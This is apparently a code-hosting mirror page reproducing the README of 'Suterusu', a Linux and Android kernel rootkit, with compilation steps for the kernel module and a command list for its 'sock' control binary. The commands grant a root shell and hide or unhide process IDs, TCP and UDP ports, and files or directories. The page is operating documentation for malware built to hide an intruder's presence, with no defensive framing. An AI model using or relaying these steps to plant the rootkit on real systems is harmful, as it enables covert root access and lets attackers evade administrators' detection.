Code Monkey home page Code Monkey logo

suterusu's Introduction

Suterusu
========

Typical compilation steps:

$ wget http://kernel.org/linux-x.x.x.tar.gz
$ tar xvf linux-x.x.x.tar.gz
$ cd linux-x.x.x
$ make menuconfig
$ make modules_prepare
$ cd /path/to/suterusu
$ make linux-x86 KDIR=/path/to/kernel


To compile against the currently running kernel (kernel headers installed):

$ make linux-x86 KDIR=/lib/modules/$(uname -r)/build


If a specific toolchain is desired for cross-compilation, provide the
CROSS_COMPILE variable during make:

$ make android-arm CROSS_COMPILE=arm-linux-androideabi- KDIR=/path/to/kernel


To compile the command binary:
$ gcc sock.c -o sock


Commands
========

Root shell
$ ./sock 0

Hide PID
$ ./sock 1 [pid]

Unhide PID
$ ./sock 2 [pid]

Hide TCPv4 port
$ ./sock 3 [port]

Unhide TCPv4 port
$ ./sock 4 [port]

Hide TCPv6 port
$ ./sock 5 [port]

Unhide TCPv6 port
$ ./sock 6 [port]

Hide UDPv4 port
$ ./sock 7 [port]

Unhide UDPv4 port
$ ./sock 8 [port]

Hide UDPv6 port
$ ./sock 9 [port]

Unhide UDPv6 port
$ ./sock 10 [port]

Hide file/directory
$ ./sock 11 [name]

Unhide file/directory
$ ./sock 12 [name]

Note: At the moment, file/dir hiding only hides names in / directory

suterusu's People

Watchers

注销 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.